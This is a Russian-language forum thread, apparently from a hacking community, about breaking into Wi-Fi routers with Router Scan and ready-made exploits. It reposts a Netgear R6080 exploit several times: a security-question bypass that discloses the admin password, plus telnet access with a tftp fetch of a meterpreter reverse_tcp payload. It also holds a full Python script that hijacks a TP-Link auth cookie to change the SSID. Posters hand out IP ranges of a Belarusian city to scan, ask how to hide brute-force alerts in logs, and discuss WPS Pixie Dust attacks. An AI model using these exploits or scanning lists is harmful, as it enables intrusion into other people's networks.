доброго времени суток. эксплойт на Netgear wifi router R6080 также применим и к JWNR2010v5 кому интересно.возможно может быть применим и к роутерскану (если его еще там нет.хотя вроде свеженькие уязвимости, но.....) Spoiler == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) для проверки на уязвимость можно поиграться Spoiler http://IP/currentsetting.htm http://IP:56688/rootDesc.xml http://IP/401_recovery.htm полный список уязвимых параметров включая телнет и готовый эксплойт Spoiler == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:[email protected]/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } # Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure # Date: 13/07/2019 # Exploit Author: Wadeek # Hardware Version: R6080-100PES # Firmware Version: 1.0.0.34 / 1.0.0.40 # Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx # Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip) == Files Containing Juicy Info == >> http://192.168.1.1/currentsetting.htm Firmware=V1.0.0.34WW Model=R6080 >> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified) <serialNumber>SSSSSSSNNNNNN</serialNumber> == Security Questions Bypass > Answers Disclosure == >> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input) <POST REQUEST> htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm) (replace) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID= (by) dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID= <POST RESPONSE> <input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1"> <input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2"> (repeat recovery process for get admin password) == Authenticated Telnet Command Execution == >> http://admin:[email protected]/setup.cgi?todo=debug :~$ telnet 192.168.1.1 R6080 login: admin Password: Str0nG-!P4ssW0rD { upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT] download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT] } шодан дорк Spoiler R6080 прошу пардонить если баян.давно не был на форуме. подотстал от событий.
еще один интересный готовый эксплойт на туполинк TL-WR1043ND V2 от 10 октября 19 г. нет времени разбираться в деталях. но не сложный в отдельных запросах. может кто опробует уязвимости и отпишется Spoiler import requests ascii = ''' __________ __ _ __ /_ __/ __ \ / / (_)___ / /__ / / / /_/ /_____/ / / / __ \/ //_/ / / / ____/_____/ /___/ / / / / ,< /_/ /_/ /_____/_/_/ /_/_/|_| ''' print(ascii) Default_Gateway = raw_input("Enter your TP-Link router IP: ") # Constants url = 'http://' url2 = '/userRpm/LoginRpm.htm?Save=Save' full = url + Default_Gateway + url2 # full = str(full) # The full GET request with the cookie authorization hijacked req_header = { 'Host': '{}'.format(Default_Gateway), 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': 'http://{}/userRpm/LoginRpm.htm?Save=Save'.format(Default_Gateway), 'Connection': 'close', 'Cookie': '''Authorization=Basic%20QWRtaW5pc3RyYXRvcjpjM2JiNTI5NjdiNjVjYWY4ZWRkMWNiYjg4ZDcwYzYxMQ%3D%3D''', 'Upgrade-Insecure-Requests': '1' } try: response = requests.get(full, headers=req_header).content except requests.exceptions.ConnectionError: print("Enter a valid Default Gateway IP address\nExiting...") exit() generate = response.split('/')[3] # Gets the randomized URL "session ID" option_1 = input("Press 1 to check if your TP-Link router is vulnerable: ") if option_1 is 1: if generate in response: print('Vulnerable!\n') option_2 = input('Press 2 if you want to change the router\'s SSID or any other key to quit: ') if option_2 is 2: newssid = raw_input('New name: ') ssid_url = '/userRpm/WlanNetworkRpm.htm?ssid1={}&ssid2=TP-LINK_660A_2&ssid3=TP-LINK_660A_3&ssid4=TP-LINK_660A_4®ion=43&band=0&mode=5&chanWidth=2&channel=1&rate=83&speedboost=2&broadcast=2&brlssid=&brlbssid=&addrType=1&keytype=1&wepindex=1&authtype=1&keytext=&Save=Save'.format( newssid) changessid_full = url + Default_Gateway + '/' + generate + ssid_url requests.get(changessid_full, headers=req_header) print('Changed to: {}'.format(newssid)) else: ("Please choose the correct option.\nExiting...") exit() else: print('Not Vulnerable') exit() else: print("Please choose the correct option.\nExiting...") exit()
Эра ролтонскана потихоньку подходит к своему концу. Там, где пару лет назад, находились тысячи устройств, теперь едва 400 набирается. В локалках весь трафик порезан, на роутерах админки с заводскими небрутабельными паролями. И админок уже на некоторых аппаратах нет. Качай мудильное приложение, сканируй QR, в приложении и настраивай.
Добрый вечер. Скажите кто-нибудь, сканирую в Router Scan близ лежащие диапазоны, но нет ничего. Сталкивался кто с таким? Может кто подможет? D4:6E:0E:3C:5A:B1 C0:4A:00:96:446 84:16:F9:20:48:24 98E0:8F:E0:6E Белтелеком Буду очень признателен!
" близ лежащие диапазоны " Гомеля 37.44.104.0-37.44.111.255 37.45.96.0-37.45.127.255 46.28.97.0-46.28.97.255 46.53.168.0-46.53.175.255 79.98.49.0-79.98.51.255 82.209.208.0-82.209.213.255 82.209.214.56-82.209.214.63 86.57.136.0-86.57.143.255 86.57.202.0-86.57.207.255 91.149.153.0-91.149.153.255 91.149.156.0-91.149.156.255 93.85.50.0-93.85.50.255 93.85.200.0-93.85.207.255 93.125.36.0-93.125.37.255 93.125.45.0-93.125.45.255 164.177.200.0-164.177.200.255 164.177.223.0-164.177.223.255 178.123.0.0-178.123.111.255 178.123.113.0-178.123.255.255 178.124.166.0-178.124.166.255 178.124.216.0-178.124.223.255 178.172.183.0-178.172.183.255 178.172.186.0-178.172.186.255 178.172.229.0-178.172.229.255 178.172.231.0-178.172.232.255 194.158.205.0-194.158.205.255
Подскажите плиз, routerscan не вытаскивает данные с модели TP-LINK TL-WR841N (из внутренней сети роутера, подключение wi-fi) - вроде бы в руководстве указано наличие эксплойта, в чём может быть проблема?
Эксплоит берет не все аппаратные версии этого роутера, и не все версии прошивок. Если есть логин и пароль администратора, но роутерскан не может ничего вытянуть, стоит роутерскан обновить. Или попинать binarymaster a, в новых прошивках, где для входа требуется только пароль, даже с рабочим паролем роутерскан не может авторизоваться.
Спс, именно логин и пароль хотелось получить - прошивка с логином и паролем (жаль, что не все берёт). Ещё есть блокировка ввода логина после 10 неправильных попыток - подумал, может на этом спотыкается routerscan - он же вроде сначала пробует авторизоваться по списку логин:пароль.. Ещё порт ssh открыт..
Всем привет. Кто нибудь решил проблему awus036NHA Windows 10(драйвер установился сам): В атаках на WPS ПИН при использовании alfa awus036nha я получал сообщение об ошибке: [-] Failed to start raw packet capture. [-] Try updating you На встроенном wi-fi все работает.
Просто стояла вин10 при покупке ноута, вроде норм винда. А строенный wi-fi я отключил и так, winpcap тож установлен.
Ребята какой параметр нужно указать в программе, чтоб в логах сканированных устройств, не было оповещений перебор паролей и т.д
Я вроде отвечал на этот вопрос ранее в этой теме. Режим монитора можно получить на некоторых адаптерах через Npcap + галка в установщике 802.11 monitor mode. Но там нет инъекций пакетов, популярные атаки реализовать не выйдет. В принципе можно заморочиться и прикрутить поддержку интерфейса airserv-ng, и подключаться RS'ом к линукс машине с вифием, но я пока до этого не дошёл. И ещё, сегодня я влил небольшое обновление для атаки на WPS. Теперь Router Scan сможет осуществлять атаку Pixie Dust сразу после M3 пакета, и завершать транзакцию по получению пин кода. Это должно помочь с некоторыми роутерами, которые дают только одну попытку на подключение по WPS.